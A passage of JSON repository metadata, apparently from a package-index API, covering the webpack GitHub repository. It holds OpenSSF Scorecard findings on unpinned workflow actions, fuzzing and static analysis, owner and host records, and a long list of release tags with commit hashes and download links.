.github/workflows/examples.yml:20: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/examples.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/examples.yml:29: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/examples.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:19: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:21: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:27: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:33: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:39: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:53: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:55: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:72: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:77: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/test.yml:85: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:96: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:98: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:109: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:111: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:118: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/test.yml:124: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:162: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:163: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:174: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:200: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/test.yml:207: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Info:   0 out of  22 GitHub-owned GitHubAction dependencies pinned","Info:   0 out of   4 third-party GitHubAction dependencies pinned"],"documentation":{"short":"Determines if the project has declared and pinned the dependencies of its build process.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#pinned-dependencies"}},{"name":"Fuzzing","score":0,"reason":"project is not fuzzed","details":["Warn: no fuzzer integrations found"],"documentation":{"short":"Determines if the project uses fuzzing.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#fuzzing"}},{"name":"SAST","score":0,"reason":"SAST tool is not run on all commits -- score normalized to 0","details":["Warn: 0 commits out of 28 are checked with a SAST tool"],"documentation":{"short":"Determines if the project uses static code analysis.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#sast"}},{"name":"Vulnerabilities","score":10,"reason":"0 existing vulnerabilities detected","details":null,"documentation":{"short":"Determines if the project has open, known unfixed vulnerabilities.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#vulnerabilities"}}]},"last_synced_at":"2025-08-20T09:35:41.151Z","repository_id":2686067,"created_at":"2025-08-20T09:35:41.151Z","updated_at":"2025-08-20T09:35:41.151Z"},"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":286080680,"owners_count":36825724,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2026-08-06T04:43:03.162Z","status":"online","status_checked_at":"2026-08-22T02:00:06.114Z","response_time":51,"last_error":null,"robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":true,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"},"owner_record":{"login":"webpack","name":"webpack","uuid":"2105791","kind":"organization","description":"","email":null,"website":"https://webpack.js.org","location":null,"twitter":null,"company":null,"icon_url":"https://avatars.githubusercontent.com/u/2105791?v=4","repositories_count":50,"last_synced_at":"2024-10-29T23:38:53.364Z","metadata":{"has_sponsors_listing":false,"funding":{"open_collective":"webpack"}},"html_url":"https://github.com/webpack","funding_links":["https://opencollective.com/webpack"],"total_stars":95072,"followers":924,"following":0,"created_at":"2022-11-02T16:19:08.894Z","updated_at":"2024-10-29T23:38:53.365Z","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/webpack","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/webpack/repositories"},"tags":[{"name":"v5.109.2","sha":"6a24bd65b72c43207c36ce61b54e1f5833486906","kind":"tag","published_at":"2026-07-28T18:14:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.109.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.109.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.109.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.109.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.109.2/manifests"},{"name":"v5.109.1","sha":"ec3908838175b79c004f61f9bf53d57a6d0e52f8","kind":"tag","published_at":"2026-07-27T21:58:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.109.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.109.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.109.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.109.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.109.1/manifests"},{"name":"v5.109.0","sha":"21cd11a1f53567a42eee3a0be822b968a1ffcb12","kind":"tag","published_at":"2026-07-23T19:19:29.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.109.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.109.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.109.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.109.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.109.0/manifests"},{"name":"v5.108.4","sha":"bb9ccfd32b8059819204a48bdb5436c9266dcdf0","kind":"tag","published_at":"2026-07-04T18:09:50.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.108.4","html_url":"https://github.com/webpack/webpack/releases/tag/v5.108.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.108.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.108.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.108.4/manifests"},{"name":"v5.108.3","sha":"6844305fc2d9bceab547b6aae6fcd7ab12d598d8","kind":"tag","published_at":"2026-06-29T22:00:20.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.108.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.108.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.108.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.108.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.108.3/manifests"},{"name":"v5.108.2","sha":"4dfe770e543f8e0c59184b9767e19b604d01af88","kind":"tag","published_at":"2026-06-29T12:56:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.108.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.108.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.108.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.108.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.108.2/manifests"},{"name":"v5.108.1","sha":"da91761ed92c8e133ee321c7db4ad6c4698cae0a","kind":"tag","published_at":"2026-06-26T13:04:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.108.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.108.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.108.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.108.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.108.1/manifests"},{"name":"v5.108.0","sha":"322b0603d6cae784063482cdc3cf8ca0b135a422","kind":"tag","published_at":"2026-06-25T09:40:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.108.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.108.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.108.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.108.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.108.0/manifests"},{"name":"v5.107.2","sha":"cfb24a4af6ea68034b25f80e14f95aaeaad6d596","kind":"tag","published_at":"2026-05-25T15:18:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.107.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.107.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.107.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.107.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.107.2/manifests"},{"name":"v5.107.1","sha":"a1ce7ebea4069d31ba27da07c07839d9dc1d69d6","kind":"tag","published_at":"2026-05-21T14:29:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.107.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.107.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.107.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.107.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.107.1/manifests"},{"name":"v5.107.0","sha":"4657874201bb3a098445fca14e2f271c82a3f91c","kind":"tag","published_at":"2026-05-20T09:40:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.107.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.107.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.107.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.107.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.107.0/manifests"},{"name":"v5.106.2","sha":"0d7e3e0153f0696311a590f90620506e8ab166ac","kind":"tag","published_at":"2026-04-15T11:44:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.106.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.106.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.106.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.106.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.106.2/manifests"},{"name":"v5.106.1","sha":"a934b9bb0330aba61e759ef943b7303ba305959f","kind":"tag","published_at":"2026-04-10T10:42:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.106.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.106.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.106.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.106.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.106.1/manifests"},{"name":"v5.106.0","sha":"8774a0110bea46f33fd2c504f59e698dbdcf136e","kind":"tag","published_at":"2026-04-08T15:11:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.106.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.106.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.106.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.106.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.106.0/manifests"},{"name":"v5.105.4","sha":"27c13b44c861908793f160f9f7413b32543c0522","kind":"tag","published_at":"2026-03-03T16:29:54.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.105.4","html_url":"https://github.com/webpack/webpack/releases/tag/v5.105.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.105.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.105.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.105.4/manifests"},{"name":"v5.105.3","sha":"714a0e3496f2189f76b5d2c98eacdeedae9e7c06","kind":"tag","published_at":"2026-02-26T10:27:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.105.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.105.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.105.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.105.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.105.3/manifests"},{"name":"v5.105.2","sha":"0756c7eb697a7759afe081a1fcf8f5481ea06bc3","kind":"tag","published_at":"2026-02-12T15:19:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.105.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.105.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.105.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.105.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.105.2/manifests"},{"name":"v5.105.1","sha":"8e50ef2035b9cb727aeaa97d7561545d1c102b91","kind":"tag","published_at":"2026-02-10T15:01:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.105.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.105.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.105.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.105.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.105.1/manifests"},{"name":"v5.105.0","sha":"1486f9aacca11d79dbb7ddbceed29b7e6df7a7ab","kind":"tag","published_at":"2026-02-03T15:30:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.105.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.105.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.105.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.105.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.105.0/manifests"},{"name":"v5.104.1","sha":"24e3c2d2c9f8c6d60810302b2ea70ed86e2863dc","kind":"commit","published_at":"2025-12-18T12:34:49.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.104.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.104.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.104.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.104.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.104.1/manifests"},{"name":"v5.104.0","sha":"505a5e744fbcf4471ddb534bf1d4aebea9643c1b","kind":"commit","published_at":"2025-12-16T13:03:15.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.104.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.104.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.104.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.104.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.104.0/manifests"},{"name":"v5.103.0","sha":"e0219482aafb9087a50ca0be45110727a33801fb","kind":"commit","published_at":"2025-11-18T11:07:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.103.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.103.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.103.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.103.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.103.0/manifests"},{"name":"v5.102.1","sha":"c7ebdbda637ea73a03a23446f5db0f600e304772","kind":"commit","published_at":"2025-10-07T16:26:11.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.102.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.102.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.102.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.102.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.102.1/manifests"},{"name":"v5.102.0","sha":"14c813a0b3709e142b3ed03355c6c15fc11b91a1","kind":"commit","published_at":"2025-09-29T18:24:41.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.102.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.102.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.102.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.102.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.102.0/manifests"},{"name":"v5.101.3","sha":"07b1ac0213bcf9591a8dd5633535a43ecd248192","kind":"commit","published_at":"2025-08-18T12:53:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.101.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.101.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.101.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.101.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.101.3/manifests"},{"name":"v5.101.2","sha":"1d9cc240a29d17f3986d9e9f96f2589d823e832c","kind":"commit","published_at":"2025-08-14T15:56:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.101.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.101.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.101.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.101.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.101.2/manifests"},{"name":"v5.101.1","sha":"4a0aa5d204dd0cfbaecd99f87be97deac5a883ff","kind":"commit","published_at":"2025-08-12T11:44:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.101.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.101.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.101.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.101.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.101.1/manifests"},{"name":"v5.101.0","sha":"5b87bedaf418b3cfa713d520bb70191098943917","kind":"commit","published_at":"2025-07-28T13:43:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.101.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.101.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.101.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.101.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.101.0/manifests"},{"name":"v5.100.2","sha":"21fcdbb8f2bb3820d3309df8e399c6deced12b42","kind":"commit","published_at":"2025-07-15T13:35:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.100.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.100.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.100.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.100.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.100.2/manifests"},{"name":"v5.100.1","sha":"ad1e3b46f46b9acd5bb9c377afcdc101338d5c96","kind":"commit","published_at":"2025-07-11T11:16:01.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.100.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.100.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.100.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.100.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.100.1/manifests"},{"name":"v5.100.0","sha":"83c534ca3a6385ee7037220c7ba510ba5a8d944c","kind":"commit","published_at":"2025-07-09T11:10:48.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.100.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.100.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.100.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.100.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.100.0/manifests"},{"name":"v5.99.9","sha":"6c9f912af2dfbb3e0e1a2a3ecdc3881c96363432","kind":"commit","published_at":"2025-05-20T11:50:38.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.99.9","html_url":"https://github.com/webpack/webpack/releases/tag/v5.99.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.99.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.9/manifests"},{"name":"v5.99.8","sha":"a9cbd85abf476fe8aba0cb1037f7e630f5f8649f","kind":"commit","published_at":"2025-05-06T13:04:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.99.8","html_url":"https://github.com/webpack/webpack/releases/tag/v5.99.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.99.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.8/manifests"},{"name":"v5.99.7","sha":"ad77deb6ed0b9540f9d2cf1a1c08f9d058a95da6","kind":"commit","published_at":"2025-04-25T10:47:50.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.99.7","html_url":"https://github.com/webpack/webpack/releases/tag/v5.99.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.99.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.7/manifests"},{"name":"v5.99.6","sha":"f8eee102c20a3d79eddfed0194113c4d5759d9e4","kind":"commit","published_at":"2025-04-18T12:05:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.99.6","html_url":"https://github.com/webpack/webpack/releases/tag/v5.99.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.99.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.6/manifests"},{"name":"v5.99.5","sha":"70e3d9d5dbd3548431b8878dead4647beff5c14f","kind":"commit","published_at":"2025-04-08T22:43:57.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.99.5","html_url":"https://github.com/webpack/webpack/releases/tag/v5.99.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.99.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.5/manifests"},{"name":"v5.99.4","sha":"04e00736b03eee0fabfd32eee5323ddc3701083f","kind":"commit","published_at":"2025-04-08T20:09:04.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.99.4","html_url":"https://github.com/webpack/webpack/releases/tag/v5.99.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.99.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/rep